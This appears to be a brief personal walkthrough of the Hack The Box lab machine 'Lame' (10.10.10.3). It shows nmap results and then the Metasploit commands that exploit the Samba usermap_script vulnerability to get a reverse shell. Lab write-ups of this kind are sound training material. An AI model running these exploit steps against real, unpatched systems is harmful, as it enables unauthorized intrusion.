# Lame
>##  10.10.10.3

nmap
>PORT    STATE SERVICE     VERSION
[21/tcp](portscan.md#21)  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[22/tcp](portscan.md#22)  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 
[139/tcp](portscan.md#139) open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[445/tcp](portscan.md#445) open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

let's start checking out that ftp with anonymous login allowed.
Nothing in the shared folder, let's google that samba service:
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/
>msfconsole
>use exploit/multi/samba/usermap_script
>set rhosts 10.10.10.3
>set lhost tun0
>exploit

and we're done
![[lame1.png]]

#machine #msf #smb